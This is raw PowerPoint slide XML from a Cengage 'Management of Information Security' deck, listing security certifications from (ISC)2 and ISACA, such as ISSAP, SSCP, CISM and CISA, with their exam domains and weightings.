        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1219200"/>
            <a:ext cx="8458200" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ISSAP®: Information Systems Security Architecture Professional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access control systems and methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Communications and network security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security architecture analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Technology-related business continuity planning and disaster recovery planning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Physical security considerations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ISSEP®: Information Systems Security Engineering Professional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Systems security engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certification and accreditation/risk management framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Technical management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>U.S. government information assurance-related policies and issuances</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FC7F5DA8-18AC-413D-9234-9EC74DDDA3EC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69787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CISSP Concentrations (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ISSMP®: Information Systems Security Management Professional Enterprise Security Management Practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Business continuity planning and disaster recovery planning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security management practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System development security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Law, investigations, forensics, and ethics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security compliance management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9517A20-3582-467C-B853-38CC403F0E7C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1970433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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Systems Security Certified Practitioner (SSCP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23557" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The SSCP certification is more applicable to an entry-level security manager than a technician, as the bulk of its questions focus on the operational InfoSec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The SSCP focuses “on practices, roles, and responsibilities as defined by experts from major IS industries” and covers seven domains: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious code and activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Monitoring and analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Networks and telecommunications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Risk, response, and recovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security operations and administration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DA4D3FEE-F35D-46B2-8480-8F32F8BBC57E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3066985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(ISC)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Certifications </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1600200"/>
            <a:ext cx="8686800" cy="4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In addition to the CISSP and its concentrations, and the SSCP, (ISC)2 offers additional, specialized certifications:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certified Authorization Professional (CAP)—For individuals responsible for maintaining and authorizing systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certified Cyber Forensics Professional (CCFP)—For individuals with digital forensics responsibility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certified Cloud Security Professional (CCSP)—For individuals with responsibility for cloud-based systems security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certified Secure Software Lifecycle Professional—For individuals with responsibility for the development and implementation of secure software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Health Care Information Security and Privacy Practitioner (HCISPP)—For individuals working in the healthcare field, or with responsibilities to manage, audit, or secure healthcare systems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B35ACD77-6CE1-4D68-A32D-ED77FA246E4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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t>Management of Information Security, 5th Edition, © Cengage Learning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2042228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ISACA Certifications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Formerly known as the Information Systems Audit and Control Association, ISACA promotes four certifications: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certified Information Security Manager (CISM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certified Information Security Auditor (CISA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certified in the Governance of Enterprise IT (CGEIT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certified in Risk and Information Systems Control (CRISC)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B35ACD77-6CE1-4D68-A32D-ED77FA246E4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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t>Management of Information Security, 5th Edition, © Cengage Learning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2409525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type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Certified Information Security Manager (CISM)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26628" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The CISM credential is geared toward experienced information security managers and others who may have information security management responsibilities </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The CISM can assure executive management that a candidate has the required background knowledge needed for effective security management and consulting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{95FB67EC-4B06-4291-A9DB-6028C50F1F27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3323027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dirty="0"/>
              <a:t>Certified Information Security Manager (CISM)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1600200"/>
            <a:ext cx="8229600" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The exam covers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1. Information Security Governance (24 %)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2. Information Risk Management and Compliance (33 %)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3. Information Security Program Development and Management (25 %)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4. Information Security Incident Management (18 %)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C18BFDED-EAA6-4104-B341-46CD648CA287}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4112969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Certified in the Governance of IT (CGEIT)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ISACA’s Certified in the Governance of IT (CGEIT) certification. is targeted at upper-level executives, including CISOs and CIOs, directors, and consultants with knowledge and experience in IT governance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The exam covers the following areas:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1. Framework for the Governance of Enterprise IT (25 %)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2. Strategic Management (20 %)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3. Benefits Realization (16 %)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4. Risk Optimization (24 %)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5. Resource Optimization (15 %)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B35ACD77-6CE1-4D68-A32D-ED77FA246E4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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t>Management of Information Security, 5th Edition, © Cengage Learning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1777908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Certified in Risk and Information Systems Controls (CRISC)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1600200"/>
            <a:ext cx="8229600" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The newest ISACA certification is the CRISC which prepares and enables IT professionals for the challenges of  IT and enterprise risk management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CRISC certification exam tests applicants over the following domains:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1—Risk Identification (27%)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2—Risk Assessment (28%)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3—Risk Response and Mitigation (23%)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4—Risk and Control Monitoring and Maintenance (22%)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applicants must also have three years experience in risk management and IS control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B35ACD77-6CE1-4D68-A32D-ED77FA246E4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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t>Management of Information Security, 5th Edition, © Cengage Learning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281151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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Certified Information Systems Auditor (CISA) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28677" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ISACA touts the CISA as being appropriate for auditing, networking, and security professionals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The exam covers the following areas of information systems auditing: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Process of Auditing Information Systems (14 %)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Governance and Management of IT (14 %) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information Systems Acquisition, Development and Implementation (19 %)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information Systems Operations, Maintenance and Support (23 %)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protection of Information Assets (30 %)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
